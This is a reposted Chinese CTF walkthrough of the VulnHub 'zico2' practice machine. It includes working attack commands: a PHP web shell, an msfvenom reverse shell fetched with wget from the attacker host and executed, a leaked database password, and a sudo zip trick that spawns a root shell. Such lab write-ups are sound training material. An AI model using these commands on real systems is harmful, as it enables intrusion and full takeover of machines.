ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

No.28-VulnHub-zico2: 1-Walkthrough渗透学习

2020-01-23 22:35:51  阅读:438  来源: 互联网

标签:shell zip No.28 zico2 Walkthrough 枚举 靶机 php root


**

VulnHub-zico2: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/zico2-1,210/
靶机难度:中级(CTF)
靶机发布日期:2017年6月19日
靶机描述:
Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主意吗?
提示:枚举,枚举和枚举!
目标:得到root权限&找到flag.txt
作者:大余
时间:2020-01-23
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

在这里插入图片描述
我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
在这里插入图片描述
我们已经找到了此次CTF目标计算机IP地址:192.168.56.128
在这里插入图片描述
nmap扫到了22、80、111、50702端口是开启的…
检出Web端口:
在这里插入图片描述
往下翻…
在这里插入图片描述
点击进入…
在这里插入图片描述
可以看到tools.html页面的URL…可能容易受到LFI的影响…试试
在这里插入图片描述
尝试获取LFI并成功使用 /…/…/etc/passwd…这边找到了zico用户…
前面提示让我们枚举,那我就枚举爆破看看…
在这里插入图片描述
/dbadmin/浏览这个目录发现了test_db.php文件…访问它
在这里插入图片描述
可以看到一个php数据库登录页面以及版本名称…
在这里插入图片描述
使用默认密码admin,成功登录进来…
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看出,这里目前我发现有三种方法可以提权…
文件上传…LFI注入…写shell在页面插入…
在这里插入图片描述
在这里插入图片描述
查看到步骤后,按照进行即可…
在这里插入图片描述
命令:<?php echo system($_GET["cmd"]); ?>在这里插入图片描述
可以看到php代码脚本已保存在数据库中…
在这里插入图片描述

二、提权

这边执行了该文件…可以看到位于www-data中…
这边思路就很简单了,先在本地创建个shell…
在这里插入图片描述
命令:msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f elf > shell
在这里插入图片描述
开启msf,我无奈的不知道为什么很简单的上传个shell上去,打开就能获得权限,可是死活就不行,我就只能求助MSF先把这台靶机拿下先,不然心态爆炸了…
在这里插入图片描述
命令:<?php system("cd /tmp;wget http://192.168.56.103:8000/shell;chmod +x shell;./shell");?>
在这里插入图片描述
重新访问下即可…
在这里插入图片描述
这边成功获得权限…这边进入zico用户后,发现了wordpress目录,进去肯定有一个wp-config.php文件可以查看账号密码的…常识
在这里插入图片描述
sWfCsfJSPV9H3AmQzw8
在这里插入图片描述
ssh成功登陆…
在这里插入图片描述
命令:sudo zip /tmp/nisha.zip /home/zico/raj -T --unzip-command="sh -c /bin/bash"
可以看到用户可以以root用户身份运行tar和zip命令,而无需输入任何密码…
将文件raj压缩为文件,然后将其移动到/tmp/nisha.zip文件夹,最后将其解压缩,然后弹出root壳…

成功获得root权限和找到flag.txt…

由于我们已经成功得到root权限&找到flag.txt,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

大余xiyou 发布了28 篇原创文章 · 获赞 4 · 访问量 4365 私信 关注

标签:shell,zip,No.28,zico2,Walkthrough,枚举,靶机,php,root
来源: https://blog.csdn.net/qq_34801745/article/details/104077562

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有